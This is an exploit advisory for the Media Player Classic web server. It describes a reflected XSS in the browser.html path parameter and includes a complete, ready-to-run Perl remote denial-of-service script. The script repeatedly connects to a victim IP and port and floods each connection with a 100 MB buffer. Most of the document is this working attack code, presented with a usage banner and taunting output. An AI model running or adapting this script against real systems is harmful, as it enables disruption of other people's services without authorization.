========================================================================================== MPC (Media Player Classic) WebServer Multiple Vulnerabilities ========================================================================================== :------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : MPC (Media Player Classic) WebServer Multiple Vulnerabilities : # Date : 16 November 2012 : # Author : X-Cisadane : # Download : http://mpc-hc.sourceforge.net/downloads/ OR Download K-Lite Mega Codec Pack http://codecguide.com/download_mega.htm : # Version : ALL : # Category : Web Applications : # Vulnerability : XSS Vulnerability and Remote Denial of Service Vulnerability : # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari :------------------------------------------------------------------------------------------------------------------------------------: WHAT IS MPC WebServer? ====================== Media Player Classic (MPC) is a compact free software media player for Microsoft Windows. The application mimics the look and feel of the old, light-weight Windows Media Player 6.4 but uses a completely different codebase, integrating most options and features found in modern media players. Media Player Classic (MPC) WebServer is part of Media Player Classic features that is a web based Remote control. You can controlling Media Player Classic from your Web Browser. HOW TO ACTIVATE MPC WebServer? ============================== Make sure you have installed Media Player Classic or K-Lite Mega Codec Pack. Run your Media Player Classic, click 'View' Menu from the Menu Bar then choose 'Options...'. In the Options Window, choose Web Interface. Enable “Listen on port”, Disable “Allow access from localhost only”. You can change the port it listens on but that’s optional (default is 13579). Apply and click 'Launch in web browser...' Or Access it from http://localhost:13579/ OR http://IP:13579/. PIC MPC WebServer : http://i48.tinypic.com/33xfomg.png PROOF OF CONCEPT ================= [1] Non Persistent XSS (Tested On Mozilla Firefox 16.0.2) Vulnerable URL : http://IP:Port/browser.html?path=[XSS] Example : http://localhost:13579/browser.html?path= PIC XSS : http://i45.tinypic.com/4j3uz4.png [2] Remote Denial of Service (Using Perl Script) C:\xampp\perl\bin>perl exploitmpc.pl 127.0.0.1 13579 *=============================================================* * --- MPC WebServer Remote Denial Of Service ---* * --- By : X-Cisadane ---* * --- ------------------------------------------------ ---* * --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---* * --- ---* *=============================================================* Ex : perl exploitmpc.pl 127.0.0.1 13579 Default Port for MPC Web Server is 13579 Please Wait Till Buffer is Done Attacking the Target, Please Wait Till Pwned PIC Remote DoS : http://i46.tinypic.com/15egs5j.png -------------------------------- [ Code ] -------------------------------------------- #!/usr/bin/perl use IO::Socket::INET; use Getopt::Std; use Socket; my $SOCKET = ""; $loop = 1000; $ip = $ARGV[0]; $port = $ARGV[1]; if (! defined $ARGV[0]) { print "\t*=============================================================*\n"; print "\t* --- MPC WebServer Remote Denial Of Service ---*\n"; print "\t* --- By : X-Cisadane ---*\n"; print "\t* --- ------------------------------------------------ ---*\n"; print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n"; print "\t* --- ---*\n"; print "\t*=============================================================*\n"; print "\n"; print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n"; print "Default Port for MPC Web Server is 13579\n"; exit; } print "\t*=============================================================*\n"; print "\t* --- MPC WebServer Remote Denial Of Service ---*\n"; print "\t* --- By : X-Cisadane ---*\n"; print "\t* --- ------------------------------------------------ ---*\n"; print "\t* --- Usage : perl exploitmpc.pl ( Victim IP ) ( Port ) ---*\n"; print "\t* --- ---*\n"; print "\t*=============================================================*\n"; print "\n"; print " Ex : perl exploitmpc.pl 127.0.0.1 13579\n"; print "Default Port for MPC Web Server is 13579\n"; print "\n"; print " Please Wait Till The Buffer is Done\n"; my $b1 = "\x41" x 100000000; $iaddr = inet_aton($ip) || die "Unknown host: $ip\n"; $paddr = sockaddr_in($port, $iaddr) || die "getprotobyname: $!\n"; $proto = getprotobyname('tcp') || die "getprotobyname: $!\n"; print "\n"; print " Attacking the Target, Please Wait Till Pwned \n"; for ($j=1;$j<$loop;$j++) { socket(SOCKET,PF_INET,SOCK_STREAM, $proto) || die "socket: $!\n"; connect(SOCKET,$paddr) || die "Connection Failed: $! .........Disconnected!\n"; $DoS=IO::Socket::INET->new("$ip:$port") or die; send(SOCKET,$b1, 0) || die "failure sent: $!\n"; print $DoS "stor $b1\n"; print $DoS "QUIT\n"; close $DoS; close SOCKET; } # exit :